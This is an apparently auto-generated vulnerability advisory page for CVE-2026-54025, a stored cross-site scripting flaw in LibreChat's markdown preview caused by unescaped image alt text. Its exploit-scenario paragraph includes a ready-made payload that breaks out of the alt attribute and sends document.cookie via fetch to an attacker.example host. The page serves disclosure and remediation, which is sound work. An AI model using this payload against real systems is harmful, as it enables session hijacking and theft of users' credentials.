Skip to main content

LibreChat CVE-2026-54025

| EUVDEUVD-2026-39463 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-25 GitHub_M
5.4
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

Network delivery, low complexity; PR:L because submission requires authentication; UI:R because victim must render the preview; S:C for iframe context crossing; C:L/I:L for session theft and DOM manipulation with no availability impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Patch available
Jun 25, 2026 - 18:03 EUVD
Analysis Generated
Jun 25, 2026 - 17:21 vuln.today

DescriptionCVE.org

LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. Prior to 0.8.4-rc1, there is a vulnerability in LibreChat's markdown artifact preview pipeline. The marked library v15.0.12 does not HTML-escape double-quote characters in image alt text when a custom renderer falls through to the default renderer. LibreChat's generateMarkdownHtml function (in client/src/utils/markdown.ts) installs a custom image renderer that returns false for URLs passing the isSafeUrl allowlist check, which causes marked to fall back to its built-in renderer. That built-in renderer inserts the raw alt text into the alt="..." attribute without escaping double-quote characters. An attacker can craft an alt text such as " onload="payload to break out of the attribute and inject an arbitrary event handler. The resulting HTML is then assigned to document.getElementById('content').innerHTML inside the Sandpack preview iframe, causing the payload to execute in the victim's browser. This vulnerability is fixed in 0.8.4-rc1.

AnalysisAI

Cross-site scripting in LibreChat's markdown artifact preview pipeline allows an authenticated attacker to inject arbitrary JavaScript into a victim's browser session via crafted image alt text. The marked library v15.0.12 fails to HTML-escape double-quote characters in image alt text when LibreChat's custom image renderer falls through to the built-in renderer, enabling attribute breakout via payloads like " onload="payload. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to LibreChat instance
Delivery
Craft markdown image with alt attribute breakout payload
Exploit
Submit content to shared conversation or artifact
Install
Victim opens artifact preview pane
C2
marked fallback renderer writes unescaped alt text to innerHTML
Execute
Event handler fires in Sandpack iframe
Impact
Attacker JavaScript executes in victim browser

Vulnerability AssessmentAI

Exploitation Exploitation requires two conditions to be simultaneously true: (1) the attacker must hold at least a low-privilege authenticated account on the target LibreChat instance, enabling them to submit markdown content containing crafted image alt text; and (2) a victim user must open or render the artifact preview pane that triggers the `generateMarkdownHtml` function with the malicious markdown. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD CVSS score of 5.4 (Medium) with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N accurately captures the realistic risk profile. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated LibreChat user crafts a message containing a markdown image with an alt attribute payload such as `![" onload="fetch('https://attacker.example/steal?c='+document.cookie)](https://legitimate-image.example/img.png)`. When another user on the same instance opens the artifact preview pane for that message, the marked fallback renderer writes the unescaped alt text into the HTML attribute without sanitization, the `onload` event fires inside the Sandpack iframe, and the attacker's JavaScript executes in the victim's browser context. …
Remediation Upgrade LibreChat to version 0.8.4-rc1 or later, which resolves this vulnerability per the vendor advisory at https://github.com/danny-avila/LibreChat/security/advisories/GHSA-3phr-62qf-cxf3. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2024-11170 HIGH POC
8.8 Mar 20

A vulnerability in danny-avila/librechat version git 81f2936 allows for path traversal due to improper sanitization of f

CVE-2024-10361 CRITICAL POC
9.1 Mar 20

An arbitrary file deletion vulnerability exists in danny-avila/librechat version v0.7.5-rc2, specifically within the /ap

CVE-2025-69222 CRITICAL POC
9.1 Jan 07

LibreChat 0.8.1-rc2 has SSRF in the Actions feature that allows authenticated users to make the server perform requests

CVE-2026-22252 CRITICAL POC
9.1 Jan 12

LibreChat before v0.8.2-rc2 allows any authenticated user to execute shell commands as root inside the container through

CVE-2025-66201 HIGH POC
8.6 Nov 29

LibreChat is a ChatGPT clone with additional features. Rated high severity (CVSS 8.6), this vulnerability is remotely ex

CVE-2024-11171 HIGH POC
7.5 Mar 20

In danny-avila/librechat version git 0c2a583, there is an improper input validation vulnerability. Rated high severity (

CVE-2025-69220 HIGH POC
7.1 Jan 07

LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control for file

CVE-2024-11173 MEDIUM POC
6.5 Mar 20

An unhandled exception in the danny-avila/librechat repository, version git 600d217, can cause the server to crash, lead

CVE-2024-10366 MEDIUM POC
6.5 Mar 20

An improper access control vulnerability (IDOR) exists in the delete attachments functionality of danny-avila/librechat

CVE-2024-41704 CRITICAL
9.8 Jul 22

LibreChat through 0.7.4-rc1 does not validate the normalized pathnames of images. Rated critical severity (CVSS 9.8), th

CVE-2024-41703 CRITICAL
9.8 Jul 22

LibreChat through 0.7.4-rc1 has incorrect access control for message updates. Rated critical severity (CVSS 9.8), this v

CVE-2026-32625 CRITICAL
9.6 Jun 02

{VAR} placeholders against the host process environment, so attacker-controlled MCP URLs cause the LibreChat backend to

Share

CVE-2026-54025 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy